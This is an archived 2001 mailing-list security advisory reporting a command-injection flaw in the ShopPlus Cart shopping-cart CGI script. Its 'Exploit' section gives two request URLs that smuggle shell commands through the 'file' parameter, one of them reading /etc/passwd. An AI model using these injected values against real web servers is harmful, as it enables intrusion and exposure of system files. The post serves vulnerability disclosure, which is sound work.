OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Kernel|X| (securepunkass.com)
Date: Wed Sep 05 2001 - 14:06:56 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

                        ------------[ advisory ]------------
    name: ShopPlus Cart

    Bug Information:
    The ShopPlus shopping cart system allows you to build a store or a mall on the Internet.
    Because of its flexibility, it allows you to sell virtually any product or services and
    fully customize the shopping experience of your web site.
    http://www.ksofttech.com/help/shopplus/

    Problem:
    Script doesnt check symbols. any user can execute commands on webserver.

    Exploit:
    host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
    host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|

    Bug found by Kernel|X| and aLph4Num3ric
    E-Mail:
    securepunkass.com [kernel|x|]
    alph4num3riccrackdealer.com [aLph4Num3ric]
    WWW: www.russiahack.com / www.tmgroup.sh

    ------------
    Thank you for using Anonymous mail system! message sent from www.tmgroup.sh